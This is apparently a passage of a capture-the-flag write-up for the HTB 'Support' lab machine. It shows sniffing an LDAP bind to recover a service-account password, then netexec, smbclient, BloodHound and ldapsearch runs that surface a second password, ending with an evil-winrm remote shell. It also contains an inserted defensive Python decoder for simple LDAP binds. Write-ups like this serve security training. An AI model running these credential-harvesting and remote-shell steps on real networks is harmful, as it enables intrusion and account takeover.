Foothold

unzip UserInfo.exe.zip

.NET Framework is installed, which means I can run the executable.

Open Wireshark and listen on tun0. The LDAP query is sent in plain text.
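As an added example (not part of the writeup), this is what that plain-text bind looks like from the defender's side: a minimal decoder for an LDAP BindRequest that flags simple authentication, which is why LDAP signing or LDAPS is needed to keep a service account's credential off the wire. The sample message and its password are constructed placeholders, not a real capture.

```python
# Minimal BER decoder for an LDAPMessage (RFC 4511) that flags simple binds:
# without TLS the simple-auth credential crosses the wire in clear text, which
# is exactly what a packet capture of a binding client exposes.

def _tlv(tag: int, body: bytes) -> bytes:
    """Encode one BER TLV (short- or long-form length)."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body

def _read_tlv(buf: bytes, pos: int):
    """Return (tag, value, position after this TLV) for the TLV at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long-form length
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length

def parse_bind_request(msg: bytes):
    """Decode an LDAPMessage; return a dict for a BindRequest, None otherwise.
    The credential bytes are parsed past but never returned."""
    tag, body, _ = _read_tlv(msg, 0)
    if tag != 0x30:                         # LDAPMessage ::= SEQUENCE
        return None
    _, mid, pos = _read_tlv(body, 0)        # messageID INTEGER
    tag, op, _ = _read_tlv(body, pos)
    if tag != 0x60:                         # [APPLICATION 0] = BindRequest
        return None
    _, ver, pos = _read_tlv(op, 0)          # version INTEGER
    _, name, pos = _read_tlv(op, pos)       # name LDAPDN (OCTET STRING)
    auth_tag, _cred, _ = _read_tlv(op, pos) # AuthenticationChoice
    auth = {0x80: "simple", 0xA3: "sasl"}.get(auth_tag, "unknown")
    return {
        "message_id": int.from_bytes(mid, "big"),
        "version": int.from_bytes(ver, "big"),
        "name": name.decode(),
        "auth": auth,
        "cleartext_credential": auth == "simple",   # what LDAP signing/LDAPS prevents
    }

# Constructed sample (not a real capture): simple bind as support\ldap, placeholder password.
SAMPLE_BIND = _tlv(0x30, _tlv(0x02, b"\x01") + _tlv(0x60,
    _tlv(0x02, b"\x03") + _tlv(0x04, b"support\\ldap") + _tlv(0x80, b"PLACEHOLDER-PW")))

if __name__ == "__main__":
    print(parse_bind_request(SAMPLE_BIND))
```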

support\ldap.$nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
$ netexec smb 10.10.11.174 -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
netexec smb 10.10.11.174 -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --shares
$ smbclient "\\\\10.10.11.174\\SYSVOL" -U ldap%'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
$ sudo bloodhound-python -d support.htb -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -ns 10.10.11.174 -c all

Didn't get much from BloodHound.

ldapsearch -H ldap://support.htb -D '[email protected]' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'dc=support,dc=htb' > ldap.out
support:Ironside47pleasure40Watchful
netexec winrm support -u support -p 'Ironside47pleasure40Watchful'
evil-winrm -i support -u support -p 'Ironside47pleasure40Watchful'